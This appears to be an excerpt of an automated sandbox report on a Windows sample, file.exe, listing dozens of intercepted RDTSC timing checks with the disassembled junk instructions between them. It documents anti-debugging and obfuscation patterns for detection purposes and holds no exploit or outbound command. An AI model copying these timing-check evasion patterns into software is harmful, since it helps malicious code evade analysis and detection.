              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1F45 second address: AF1F4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A932BB second address: A932C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6715 second address: AF6731 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD184FDBE82h 0x00000008 jng 00007FD184FDBE76h 0x0000000e jp 00007FD184FDBE76h 0x00000014 js 00007FD184FDBE7Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF69B6 second address: AF69C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCBD6 second address: AFCBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD184FDBE76h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCBE1 second address: AFCBE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCBE7 second address: AFCBFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a js 00007FD184FDBE84h 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FD184FDBE76h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDA3 second address: AFCDA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDA8 second address: AFCDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD184FDBE76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD184FDBE7Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDC6 second address: AFCDFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD185A97D11h 0x00000008 jmp 00007FD185A97D0Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD185A97D19h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDFC second address: AFCE0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCE0A second address: AFCE11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCE11 second address: AFCE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FD184FDBE7Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FD184FDBE76h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918A4 second address: A918A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918A8 second address: A918D2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FD184FDBE76h 0x00000012 jmp 00007FD184FDBE88h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918D2 second address: A918D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E51 second address: B02E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E56 second address: B02E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD185A97D06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E62 second address: B02E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E66 second address: B02E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E72 second address: B02E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD184FDBE76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E7C second address: B02E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0254C second address: B02550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02550 second address: B0255D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B026F4 second address: B026F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B56 second address: B02B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B5C second address: B02B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B68 second address: B02B72 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02CBE second address: B02CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02CC8 second address: B02CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FD185A97D0Fh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA08AF second address: AA08B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0704E second address: B07057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07057 second address: B0706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FD184FDBE76h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0706C second address: B0707B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0707B second address: B07081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B071AF second address: B071B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B071B5 second address: B071CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD184FDBE83h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07329 second address: B0732D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0732D second address: B07344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0763C second address: B07640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B077AC second address: B077E8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD184FDBE8Bh 0x00000008 jmp 00007FD184FDBE85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007FD184FDBE83h 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B077E8 second address: B07802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D10h 0x00000007 jl 00007FD185A97D0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06D4B second address: B06D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FD184FDBE82h 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06D65 second address: B06D77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FD185A97D06h 0x00000009 pop ecx 0x0000000a jo 00007FD185A97D0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06D77 second address: B06D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD184FDBE80h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06D91 second address: B06DA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FD185A97D06h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD185A97D06h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07C50 second address: B07C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD184FDBE88h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07C71 second address: B07C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07C75 second address: B07C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE82h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07C8D second address: B07CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D14h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07CA6 second address: B07CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B56F second address: B0B57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FD185A97D06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B57E second address: B0B582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B582 second address: B0B58C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD185A97D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0B58C second address: B0B592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B7BF second address: A9B7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B100DE second address: B100EA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD184FDBE7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B100EA second address: B100F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B100F4 second address: B100F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDC06 second address: ADDC72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FD185A97D0Eh 0x00000010 nop 0x00000011 mov ecx, dword ptr [ebp+122D1E91h] 0x00000017 lea eax, dword ptr [ebp+1249196Fh] 0x0000001d js 00007FD185A97D0Ch 0x00000023 mov dword ptr [ebp+122D1C09h], eax 0x00000029 nop 0x0000002a jmp 00007FD185A97D11h 0x0000002f push eax 0x00000030 pushad 0x00000031 jmp 00007FD185A97D10h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD185A97D0Bh 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDD4B second address: ADDD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE191 second address: ADE197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE217 second address: ADE274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jg 00007FD184FDBE7Ch 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a js 00007FD184FDBE87h 0x00000020 jmp 00007FD184FDBE81h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jmp 00007FD184FDBE80h 0x0000002e pop eax 0x0000002f mov edx, dword ptr [ebp+122D1E18h] 0x00000035 push 4E6F16D2h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE274 second address: ADE278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE278 second address: ADE27E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE36F second address: ADE3A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD185A97D12h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 js 00007FD185A97D06h 0x00000016 pop eax 0x00000017 push esi 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop esi 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d mov cx, 8921h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jnp 00007FD185A97D08h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE563 second address: ADE567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE6FD second address: ADE701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEADB second address: ADEB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD184FDBE89h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEC6F second address: ADEC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEEBB second address: AC0FE7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD184FDBE84h 0x00000008 jmp 00007FD184FDBE7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FD184FDBE7Fh 0x00000015 nop 0x00000016 mov dx, ax 0x00000019 lea eax, dword ptr [ebp+124919B3h] 0x0000001f jmp 00007FD184FDBE87h 0x00000024 mov edx, ebx 0x00000026 nop 0x00000027 jc 00007FD184FDBE7Ah 0x0000002d push eax 0x0000002e pushad 0x0000002f popad 0x00000030 pop eax 0x00000031 push eax 0x00000032 jg 00007FD184FDBE7Eh 0x00000038 nop 0x00000039 sub ecx, dword ptr [ebp+122D2CB6h] 0x0000003f lea eax, dword ptr [ebp+1249196Fh] 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FD184FDBE78h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f push esi 0x00000060 mov edx, 729A2517h 0x00000065 pop ecx 0x00000066 push eax 0x00000067 jmp 00007FD184FDBE88h 0x0000006c mov dword ptr [esp], eax 0x0000006f or dword ptr [ebp+122D2812h], esi 0x00000075 call dword ptr [ebp+122D2363h] 0x0000007b push eax 0x0000007c push edx 0x0000007d js 00007FD184FDBE89h 0x00000083 push ebx 0x00000084 pop ebx 0x00000085 jmp 00007FD184FDBE81h 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B103C2 second address: B103C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10517 second address: B10520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10662 second address: B10679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 jmp 00007FD185A97D0Bh 0x0000000c popad 0x0000000d push ecx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10BC9 second address: B10BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD184FDBE86h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10D85 second address: B10DB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Dh 0x00000007 jmp 00007FD185A97D18h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10DB4 second address: B10DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B127E8 second address: B12807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD185A97D06h 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FD185A97D0Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12807 second address: B1280D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94DB7 second address: A94DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94DBC second address: A94DCC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD184FDBE82h 0x00000008 jng 00007FD184FDBE76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B196B9 second address: B196BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B196BD second address: B196C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B196C3 second address: B196E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B196E3 second address: B196F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FD184FDBE76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B199B7 second address: B199C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FD185A97D06h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B199C6 second address: B199CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A25F second address: B1A263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A263 second address: B1A26D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD184FDBE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A26D second address: B1A29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD185A97D0Fh 0x0000000c jmp 00007FD185A97D0Ah 0x00000011 jbe 00007FD185A97D06h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A417 second address: B1A41C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A56F second address: B1A575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A575 second address: B1A57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
